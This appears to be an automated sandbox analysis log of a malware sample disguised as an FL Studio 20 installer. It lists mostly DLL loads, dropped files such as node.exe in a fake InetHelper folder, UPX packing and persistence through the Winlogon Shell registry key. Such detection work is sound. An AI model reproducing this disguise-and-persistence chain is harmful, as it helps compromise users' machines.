Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\wnsCCC1.tmpSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\wnsCCC1.tmpSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\wnsCCC1.tmpSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\wnsCCC1.tmpSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\wnsCCC1.tmpSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\wnsCCC1.tmpSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\wnsCCC1.tmpSection loaded: oleacc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\wnsCCC1.tmpSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\wnsCCC1.tmpSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\wnsCCC1.tmpSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\wnsCCC1.tmpSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\wnsCCC1.tmpSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\wnsCCC1.tmpSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\wnsCCC1.tmpSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\wnsF0F3.tmpSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\wnsF0F3.tmpSection loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\wnsF0F3.tmpSection loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\wnsF0F3.tmpSection loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\wnsF0F3.tmpSection loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\wnsF0F3.tmpSection loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\wnsF0F3.tmpSection loaded: oleacc.dll
Source: C:\Users\user\AppData\Local\Temp\wnsF0F3.tmpSection loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\wnsF0F3.tmpSection loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\wnsF0F3.tmpSection loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\wnsF0F3.tmpSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\wnsF0F3.tmpSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\wnsF0F3.tmpSection loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\wnsF0F3.tmpSection loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: winrnr.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: framedynos.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: msxml6.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sxs.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: framedynos.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: msxml6.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sxs.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: framedynos.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: msxml6.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sxs.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: framedynos.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: msxml6.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sxs.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: framedynos.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: msxml6.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sxs.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: framedynos.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: msxml6.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sxs.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: framedynos.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: msxml6.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sxs.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: framedynos.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: msxml6.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sxs.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: framedynos.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: msxml6.dll
Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeDirectory created: C:\Program Files\Image-LineJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeDirectory created: C:\Program Files\Image-Line\FL Studio 20Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeDirectory created: C:\Program Files\Image-Line\FL Studio 20\__tmp_rar_sfx_access_check_5937078Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeDirectory created: C:\Program Files\Image-Line\FL Studio 20\FL64.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeDirectory created: C:\Program Files\Image-Line\FL Studio 20\FLEngine_x64.dllJump to behavior
Source: Replace.exeStatic file information: File size 36540866 > 1048576
Source: Replace.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: compiler: cc /Zi /Fdossl_static.pdb -DOPENSSL_IA32_SSE2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAES_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPADLOCK_ASM -DPOLY1305_ASM source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp
Source: Binary string: !"#$% !"#$%&'()*+,-./0123456789:;<=>?@ABCD./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyzdes(long)compiler: cc /Zi /Fdossl_static.pdb -DOPENSSL_IA32_SSE2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAES_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPADLOCK_ASM -DPOLY1305_ASMbuilt on: Tue Mar 15 17:28:15 2022 UTCplatform: OPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "NUL"not available@@@@@@@@@hHHHH@@@@@@@@@@@@@@@@@@( source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: Replace.exe, 00000000.00000003.1668526597.0000000004074000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000002.00000000.1694241390.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmp, run.exe, 00000002.00000003.1696934689.0000019819FC2000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmp, run.exe, 00000002.00000003.1701249383.00000198188A8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\ws\out\Release\node.pdb source: node.exe, 0000000F.00000002.2913751697.0000000001801000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000001801000.00000040.00000001.01000000.0000000C.sdmp
Source: Replace.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Replace.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Replace.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Replace.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Replace.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: initial sampleStatic PE information: section where entry point is pointing to: .xda3
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeFile created: C:\Program Files\Image-Line\FL Studio 20\__tmp_rar_sfx_access_check_5937078Jump to behavior
Source: wnsCCC1.tmp.7.drStatic PE information: real checksum: 0x0 should be: 0x6be3de
Source: node.exe.13.drStatic PE information: real checksum: 0x0 should be: 0x694243
Source: cleaner.exe.13.drStatic PE information: real checksum: 0x0 should be: 0x89c7
Source: wsc86FC.tmp.0.drStatic PE information: real checksum: 0x0 should be: 0x10fd7
Source: wnsF0F3.tmp.10.drStatic PE information: real checksum: 0x0 should be: 0x6be3de
Source: FL64.exe.2.drStatic PE information: real checksum: 0x49c24 should be: 0x4d1a4
Source: wnsA071.tmp.1.drStatic PE information: real checksum: 0x0 should be: 0x6be3de
Source: run.exe.0.drStatic PE information: section name: .didat
Source: run.exe.0.drStatic PE information: section name: _RDATA
Source: FL64.exe.2.drStatic PE information: section name: _RDATA
Source: FLEngine_x64.dll.2.drStatic PE information: section name: .didata
Source: FLEngine_x64.dll.2.drStatic PE information: section name: .xda0
Source: FLEngine_x64.dll.2.drStatic PE information: section name: .xda1
Source: FLEngine_x64.dll.2.drStatic PE information: section name: .xda2
Source: FLEngine_x64.dll.2.drStatic PE information: section name: .xda3
Source: C:\Users\user\Desktop\Replace.exeCode function: 0_2_00BD9153 push ecx; ret 0_2_00BD9166
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeCode function: 23_3_02134F08 push eax; ret 23_3_02134EE9
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeCode function: 23_3_02135130 push eax; retf 23_3_0213512D
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeCode function: 23_3_02133921 pushad ; ret 23_3_02133975
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeCode function: 23_3_02134D71 push eax; ret 23_3_02134EE9
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeCode function: 23_3_02134F74 push eax; retf 23_3_0213512D
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeCode function: 23_3_021335E9 push eax; iretd 23_3_021335F5
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeCode function: 30_3_02253921 pushad ; ret 30_3_02253975
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeCode function: 30_3_02255130 push eax; retf 30_3_0225512D
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeCode function: 30_3_02254F08 push eax; ret 30_3_02254EE9
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeCode function: 30_3_022535E9 push eax; iretd 30_3_022535F5
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeCode function: 30_3_02254F74 push eax; retf 30_3_0225512D
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeCode function: 30_3_02254D71 push eax; ret 30_3_02254EE9
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeFile created: C:\Program Files\Image-Line\FL Studio 20\FL64.exeJump to dropped file
Source: C:\Users\user\Desktop\Replace.exeFile created: C:\Users\user\AppData\Local\Temp\wsc86FC.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeFile created: C:\Program Files\Image-Line\FL Studio 20\FLEngine_x64.dllJump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\wnsA071.tmpJump to dropped file
Source: C:\Users\user\Desktop\Replace.exeFile created: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmpFile created: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exeJump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\wnsF0F3.tmpJump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\wnsCCC1.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmpFile created: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeJump to dropped file

Boot Survival

barindex
Creates an undocumented autostart registry key
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmpKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
